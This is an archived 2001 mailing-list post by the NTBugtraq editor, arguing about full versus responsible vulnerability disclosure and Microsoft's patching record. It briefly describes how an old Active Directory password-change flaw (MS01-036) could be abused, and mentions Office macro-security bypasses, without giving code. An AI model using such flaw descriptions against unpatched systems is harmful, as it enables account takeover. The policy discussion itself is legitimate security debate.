Re: Towards a responsible vulnerability process

From: Russ (Russ.Cooper@RC.ON.CA)
Date: 11/04/01

Message-ID:  <>
Date:         Sun, 4 Nov 2001 15:29:56 -0500
From: Russ <Russ.Cooper@RC.ON.CA>
Subject:      Re: Towards a responsible vulnerability process

This response to David's email has turned into my "bigger piece". It's a bit
of a ramble, so I hope you can follow along.

David LeBlanc wrote;

This is an example of a simplistic approach and flawed logic. Some vendors
might not be motivated, others might. To believe that vendors all behave the
same way is flawed. To believe that behaviors don't change over time is to
dismiss people's ability to learn from both their own mistakes and others.
For example, I proved in the past that I was stupid enough to drive around
with no seatbelt. After flipping my VW Bus over end to end, I don't go out
of my driveway without one. People and groups of people clearly change
behaviors over time in many instances.

If seatbelts had just been invented, and nobody told you repeatedly to use
them, I might understand the validity of this statement. Unfortunately, it
demonstrates the lack of learning by both people and groups of people quite
well. Despite numerous warnings, studies, commercials, all stating the
obvious benefits of seatbelts, some people will happily ignore them until
something big enough happens.

This is the basis of some beliefs of Full Disclosure. Let the media make a
huge story out of a vulnerability and maybe the company involved will get
sufficiently embarrassed to respond in a way to avoid it more rigorously in
the future.

PoisonBox + Code Red + Nimda + Gartner report = Microsoft Strategic
Technology Protection Program.

Doesn't matter whether that equation is true or not, it's a valid perception
for the public to have. And it's a motivation for some malcode writers.

Microsoft has run the train off the tracks many times in the past. Two and a
half years ago that resulted in the Secure Windows Initiative. The Secure
Windows Initiative resulted in Windows XP being shipped with a Critical
Update being available on the day of its launch.

To use your car analogy, had XP been a car it would have been recalled,
fixed, and shipped anew. No such mechanism exists for Microsoft CDs despite
the clearly demonstrated historical proof that most people install the
defaults from the original CD and never update it.

So a vendor who won't fix bugs unless their customers are threatened with
active attack is a very different problem than one who fixes problems when
they are reported. If you turn the clock back several years, there were more
vendors in the first category than the second, and faced with that past
reality, Full Disclosure (tm) was a reasonable response. I will argue that
it may not be a reasonable response for all vendors today.

I think part of the point is being missed here, seriously. Getting a fix is
good, getting it fast is good, and getting one that works is also important.
The hard part is getting the fix applied before its widely exploited.

The best way to effect that is to not produce software that requires such
fixes in the first place. "You're dreaming", I can hear the refrain coming
from software vendors now. Regardless, its as factual that no software is
bug-free as it is that software must be bug-free.

Fact is that very few software vendors have demonstrated any capacity to do
better at this. In general, software vendors produce software that contains
security vulnerabilities, vulnerabilities that can be widely exploited, and
they then rely on the patch mechanisms to remedy the coding mistakes. This
despite the fact that, again in general, people have clearly demonstrated an
inability to use any mechanism that applies fixes.

So as you can see, everyone repeats the same mistakes over and fails to
learn. The insistence that there cannot be bug-free software, coupled with
the blessing that consumers today will accept being repeatedly told they
must invest their time and frustration into a Vendor's patch process, leaves
us with only one choice...stop publishing exploits.

A better patch process is still, at least, 6 months out. "Prefix" yielded
the launch-date release of a Critical Update for XP. David LeBlanc and
Michael Howard write a book about "writing secure code" despite not seeing a
significant tangible benefit from their talent through their employers. Not
to mention the fact that books have been written since the cows came home
decrying the perils of coding insecurely without noticeable effect on
Microsoft programmers.

But then this is probably a 5-year plan, not something the fee-paying public
should expect to see quick effect from.

As a short digression, I think that "Full Disclosure" has become a bit of a
religeous term, along with the requisite true believers and heritics. You're
either one of us, or you're one of them. And those who we call them are
always on the wrong side of everything. IMHO, this tends to discourage
rational thought. This isn't to say that all proponents of Full Disclosure
are irrational, just that we ought to think about ways to make the whole
process work better. As security people, we're supposed to think outside the
box, so I find it curious that we set about constructing our own boxes. <g>
People sometimes construct some very interesting reality tunnels.

I agree, people do sometimes construct some very interesting reality
tunnels. Let me give you some examples;

1. NT 4.0 is hugely deployed, widely exploited, and quite obviously a very
bad example of secure coding, implementation, and use. Regardless, Microsoft
employs its Secure Windows Initiative to Windows XP, exclaiming that people
can upgrade to a more secure environment. Hmm, sounds like an upgrade plan
rather than an honest attempt to get people more secured.

Do we get new, secured, versions of the NT 4.0 Option Kit? A version that
doesn't re-implement known security vulnerabilities when its run? A version
that acknowledges the many workarounds that have proven effective, embraces
them, and fills in the gaps? Nope, instead the Security CD offers us more of
what we've shown we don't want, patches, and scripts that ignore reality.

2. Can we slip-stream NT 4.0 service packs and Hotfixes yet? Nope, despite
the fact that it would mean Microsoft, and its customers, could publish a CD
that could take care of everything. But we can do this with W2K, so just
upgrade and you'll get more secure.

3. Have Microsoft Product Managers for the various products gotten together
and acknowledged that they need to work together? Not that we the public can
see. We get the "Cumulative NT 4.0" fix, the "Cumulative IIS 4.0" fix,
"Index Server patches", the "Office SRX" patch, "IE" patches, "SQL Server"
patches, Exchange Patches, and each are independent and rarely refer to each
other. Microsoft's reality suggests that NT Administrators want to, and are
able to, sort all of this out by themselves.

Now let's rationally analyze what sorts of vulnerabilities lead to
widespread attacks. I've seen a lot of vulnerabilities go by, some big, some
small, and not all of them lead to widespread attacks. It's bad enough to
have a problem in a system you're trying to protect without a bazillion
monkeys (er, script kiddiez) all trying to hack you at once. Now, like any
complex behavior, we have to deal with statistical trends - there's always
going to be exceptions. Would it be possible to find security problems, get
a fix created, get them applied, and do this without being subject to
widespread attacks? I think so, because this happens sometimes. Can we
possibly find ways to behave so that this happens more frequently? I think

For example, one day at ISS, I came in to find every NT system on our
network blue screened. Something had gone horribly wrong both in NT and our
UNIX scanner. Within a couple of days, Microsoft gave us a private patch to
test, it worked, and shortly thereafter they shipped a Hotfix (post SP-2 NT
4.0, I think). There was no advisory, no arm-twisting, and no public
attacks. It would be hard to find a system today that would be vulnerable.
It would be harder still to find the exploit. This is an example of the
process working right.

Now let's consider what widespread attacks have in common - there is
typically a user-friendly attack created by someone. It is often preceded by
published "proof-of-concept" code. It is sometimes preceded by an attack
created in the black hat community that's leaked out. While discussing this
with Mudge, he pointed out to me that black hat attacks leaking seem to be
more common with UNIX exploits - neither of us are sure why. I would assert
that creating and distributing a user-friendly attack is irresponsible, as
it will most often lead to widespread attacks.

As you reduce the number of known, or widely discussed, vulnerabilities you
simply reduce the number of potential wide-spread attacks. There was a study
done (by Don Parker I believe) that said, in essence, it matters not how old
a vulnerability is. If its published, it may be exploited. The nature of
vulnerabilities are such that its near impossible to tell, with certainty,
whether something is going to be "widely exploited" or not until the
exploits come. Even locally-exploitable-only vulnerabilities have been
exploited remotely and en-masse, thanks to HTML-based email, scripting, and

So, we should accept that there are only two choices. Don't disclose to
anyone other than the Vendor and hope nobody else ever discovers the same
problem before all affected systems are patched...or...disclose and accept,
indeed expect, widely exploited problems.

We have been practicing both for many years now, and its unreasonable to
suggest that due to one, the other has failed. Both have failed. Emphasizing
one more than the other is likely to fail also.

The reason is that the problem does not lie within, and cannot be entirely
solved by, either practice. Yet it seems that now the emphasis is being
placed on one or the other practice. This is being done by Microsoft through
its Information Anarchy article, other Vendors, and the Research community.

As the coiner of the phrase "Responsible Disclosure", I'd like to point out
that its intent has never been to emphasize one or the other disclosure
practice. Instead, the objective of Responsible Disclosure as I defined it
has been to promote better User/Consumer awareness of security.

For its only with this awareness will there be change. Consumers need to
make security a greater part of their purchase decision, be they a CIO of a
Fortune 500 company, or a kid deciding which game to buy for his/her PC.
Gasoline consumption of your car was hardly ever considered prior to the
70's, but with the realities of oil shortages and rising costs, consumers
made mileage an important aspect of their car purchasing decisions. We need
to take a similar approach, or at least try and achieve a similar result.

When MS01-036 (Function exposed via LDAP over SSL could enable passwords to
be changed) was first disclosed to me on May 16th (fix published June 25th)
I was aghast. Basically, if you used Active Directory, and improved its
security by employing LDAP over SSL for AD communications, you opened
yourself up to an otherwise unexploitable condition. You could change the
Administrator password without having to know a prior password...simply send
a request to change the password with any old thing in the previous password
field and the password would be updated! Yikes!!

When I informed Microsoft of the issue I made the recommendation, after
discussing it with the discoverer, that the best thing would be to not say
anything to the public at all. Fix it, but see if we can't find some other
way of announcing a patch that did not give away the fact that this
extremely important security feature was so badly botched in development. I
didn't see how anyone could benefit from being told the realities of the
problem, and since the only solution was to not use SSL for LDAP password
changes (um, sounds rather insecure to me), only a patch could solve the

Basically, they said they couldn't bury the fix and needed to disclose it,
which they did. Its pretty likely that this will haunt W2K AD environments
for years to come.

My reasoning for not disclosing? If something as obvious as testing whether
or not a Domain Administrators password could be changed without sufficient
privilege had been missed during QA, what else is missing? What would the
public think of AD, Microsoft, Microsoft's commitment to security, and the
security of an AD environment after having the issue explained to them?

The harm this could cause to confidence in Microsoft security would be huge,
I thought.

With AD the heart of all Microsoft-encouraged environments, and LDAP over
SSL being the obviously more secure method of use, the most secure setup
wasn't tested in almost 2 years of testing of W2K prior to release.

Where in May/June of this year I was of the opinion that such things need
not be disclosed to the public, today I'm far more convinced than every that
such things need to be publicized as broadly as possible. Would you buy a
lock, or anything protected by a lock, from a company that doesn't test
whether (or fails to notice that) it can be opened by just any old key?

That's a statement of fact for any Microsoft-recommended configurations of
W2K Active Directory Controllers in existence today (or that will be
constructed from existing W2K CDs in the future) who haven't applied the

But due to a lack of disclosure and discussion, neither the discoverer, or
I, ever published the simple and obvious steps that could exploit the
vulnerability, the issue was largely ignored by the media, and the

Are we likely to see exploitable boxes in the future, your damn right we
are. What are the chances that every AD controller out there is going to
have SP3 on it? I'd say pretty high. Shouldn't the CDs be recalled and
replaced with versions that don't contain the exploit? Isn't the problem
serious enough to warrant dramatic steps to ensure the keys to the kingdom
are being left wide open to anyone who can connection on TCP636?

Bottom line is that no, quietly hiding facts that allow people to make risk
decisions, purchasing decisions, decisions involving the integrity,
veracity, and quality of product of a given Vendor, need to be aired as long
as the Vendor sees fit as to leave the onus on the customer to take the
appropriate steps to correct the issue. If the Vendors did recalls, I
believe, it would be different. If the media were better able to reach the
millions of consumers potentially affected by these problems, it might be
different. If the public was, in general, more aware of the need to pay
attention to these issues, it might be different.

Unfortunately, none of those mitigators are true today. So we need to work
on them, not the Vulnerability Disclosure procedure.

Let's think about how to set about actually finding vulnerabilities in
systems. I've written several hundred checks for vulnerabilities. Sometimes,
you either exploit the vulnerability or not - e.g., if you can log in via

Proof-of-concept code, user-friendly exploits, exploit scripts, etc... All
need to be considered within the context of the issue that's at hand. In
general, "thou shalt do no harm to those who have not caused the problem"
should be upheld. But what if the lemmings don't know they're DoS'ing the
Internet? What if the Web Hosting Provider knows their systems are
vulnerable and being exploited, but insist they can't afford the time to fix

In the "Father knows best" environment that Microsoft seems to believe its
in, Microsoft needs to fix not only the problem, but the machines which are
vulnerable to (or being exploited via) the problem. Either give us a way
that *we want* to manage the issues, or do it for us. Giving us a way that's
less effort for Microsoft, one that keeps us liable, and disclaiming all
liabilities for the problem in the first place, is certainly not conducive
to the heart of the issue (getting fixes onto machines).

So, with those realities in mind, is it any wonder that people disclose,
write exploits, cause wide exploits? I don't think it is. Microsoft's not
getting it, their customers aren't, so some people take dramatic steps to
make their point. Anti-social, sure! Malicious, definitely! But what
alternative is being spoken about? Solve the problem or just hide the
problem as much as possible to make it appear like there's less of a

It's a matter of fact that Microsoft is leaving it largely up to its
customers to solve the problem.

I also have experience as a development manager, and I can tell you for sure
that the more pressure there is to get a fix out quickly, the less likely
the fix is going to be thorough and the more likely it is to create new
bugs. This is true of _any_ bug, not just security bugs. It's a good thing
to give people enough time to fix things thoroughly. That's not to say that
anyone should be allowed to just delay without cause - there's a balance to
be struck here. A responsible vendor responds promptly, and responsible
reporter gives a vendor enough time to be thorough - you may have just
uncovered the tip of the iceberg, and the quick fix to your problem might be
simple. The fix to the bigger problem might be complex. I'd rather see one
fix that is comprehensive than a series of quick fixes for the same thing.

Great, if all we care to know is that Microsoft has determined there's a
problem, assigned it their interpretation of a risk metric, and on their own
determined whether the fix is effective, breaks anything else, or breaks an
administrative process.

I would strongly argue that given Microsoft's current level of integrity on
such issues, *most people* do not want to leave it to Microsoft to do all of
this. It would be better to see fixes rolled out on a risk by risk basis
than something developed in a vacuum at Microsoft that rolls up numerous,
previously undisclosed, issues.

Since, I would argue vehemently, we cannot trust Microsoft to give us
sufficient information to ensure we can reasonably determine the risks of
our own actions (or lack thereof), we end up relying on others to give us
this information, knowledge, capability.

Microsoft expects us to apply each fix, every fix, yet determine whether or
not its appropriate for our environment. We're often reminded that we should
only apply the fix if we've experienced the problems it describes.
Wonderful, but what if I haven't deployed the environment yet? What if I
don't understand how the problem can be manifested? How can I then determine
my risk, my exposure to the problem? It's a reactive premise, not proactive,
yet the customer wants proactive measures.

Ergo, its often better for a researcher to dribble out issues with a given
service/application than to announce all of the problems at once. Microsoft
have clearly demonstrated in the past that they do not take vulnerability
discoveries much beyond the actual information their given. For example;

MS01-034 - June 21, 2001, Change 1 byte in a Word document and skip all
Macro Security.
MS01-050 - October 4, 2001, Malform an Excel or PowerPoint document and skip
all Macro Security.

In the 3 months since MS01-034 was informed by a discoverer about the Word
issue, the Office folks didn't bother to see if there was any other way to
do this with Excel or PowerPoint. It took another researcher to tell
Microsoft how it could be done.

Well, its obvious to me that I can rely on Microsoft to find and fix these
issues thoroughly. Would we have been better to wait 3+ months for Microsoft
to discover the Excel and PowerPoint problems on their own, or was the
disclosure of the Word vulnerability motivation for someone else to find a
similar problem in Excel and PowerPoint? I'd argue the latter is more true
than the former.

And there are a lot more examples with IIS and Unicode conversion than there
are with Office. So David, I'd argue that your point is invalid in the case
of Microsoft. It certainly may be valid with other Vendors though.

Chris Wysopal (Weld Pond) has been doing these same sorts of things even
longer than I have, and he's reached some similar conclusions. Think about
how we can encourage vendors to make better products, get fixes created and
applied, and do so without encouraging what amounts to network terrorism.
That's the goal. Let's try and find ways to get there.

I'm sorry, but this goal is rather pathetic. It has been the goal for 30+
years, and its failed miserably, so now is the time for a new approach. And
this new approach needs to be customer-centric, not Vendor-centric.

Vendors are getting paid to make better products, so they should hardly need
"encouragement". If they're not encouraged enough now, then charge more for
your products. The simple fact is that Vendors have not been sufficiently
satisfied with the cries and complaints of their customers to do what they
should be doing, writing better products.

"get fixes created and applied" again, isn't a Vendor problem. Making
Vendors liable for the problems their bugs create would be more than
adequate stimulation for Vendors to get fixes created and applied, but that
would never be proposed by a Vendor, now would it. Yet as long as a Vendor
has no liability, the Vendor will always have the luxury of making that
decision...seemingly regardless of what its customers say. In lieu of vendor
liability, give the customers the information they need to make accurate and
informed decisions.

As for encouraging network terrorism, obviously it harms those who are not
at fault for the problem so its never a good idea. The customers only hope
at defending themselves is through information. Tell me I shouldn't go out
today because there is a terrorist threat, shame on you. Tell me that if I
wear a blue shirt and go out today and I might be targeted, and I go out in
a blue shirt, shame on me.

IOWs, as the main Vendor, Microsoft needs to *give* me easily understood and
usable tools that take my environment and protect me against terrorism
targeted at mistakes Microsoft has made in its products that I use.
Microsoft needs to do that proactively (otherwise I'm going to be subjected
to the terrorism) and comprehensively. Clearly this is a costly proposal,
and hopefully the cost of this effort will make it clear to the powers that
be that the better strategy is;

1. Better code.
2. Increased testing.
3. More secure defaults.
4. Security as an integral part of everything.
5. Increased user education (or simpler tools).

This with the thought in mind that we're vulnerable now, we don't all want
to move to a new environment, and we're being attacked as we speak!

Fix what we have!

Russ - NTBugtraq Editor

Relevant Pages

  • Re: [Full-Disclosure] Comments on 5 IE vulnerabilities
    ... > Much ado has been made about those vulnerabilities and they have been ... That's probably exactly WHY people stop informing Microsoft and hoping ... > approach is to focus on proactive security measures that prevent ... > notify vendors of potential vulnerabilities and give them some time to ...
  • Re: MS02-064 fix time
    ... have a proven fix - this probably isn't the longest time. ... vendors were first made aware of bugs. ... this year's vulnerabilities have quantifiable notification-to-release ... provided a fix within 1 business day of receiving initial notification ...
  • Re: [Full-disclosure] How much time is appropriate for fixing a bug?
    ... irrespective of the vendors' ultimate remedy. ... fix a bug, and/or when they will or won't fix it. ... As long as they don't fix known vulnerabilities and bugs their products ...
  • RE: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
    ... >The company is planning to reward security researchers who reveal ... >information on newly discovered vulnerabilities. ... >3Com will notify affected vendors of security flaws so they can ... >other security vendors prior to public disclosure. ...
  • Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
    ... > The company is planning to reward security researchers who reveal ... > information on newly discovered vulnerabilities. ... > 3Com will notify affected vendors of security flaws so they can ... > other security vendors prior to public disclosure. ...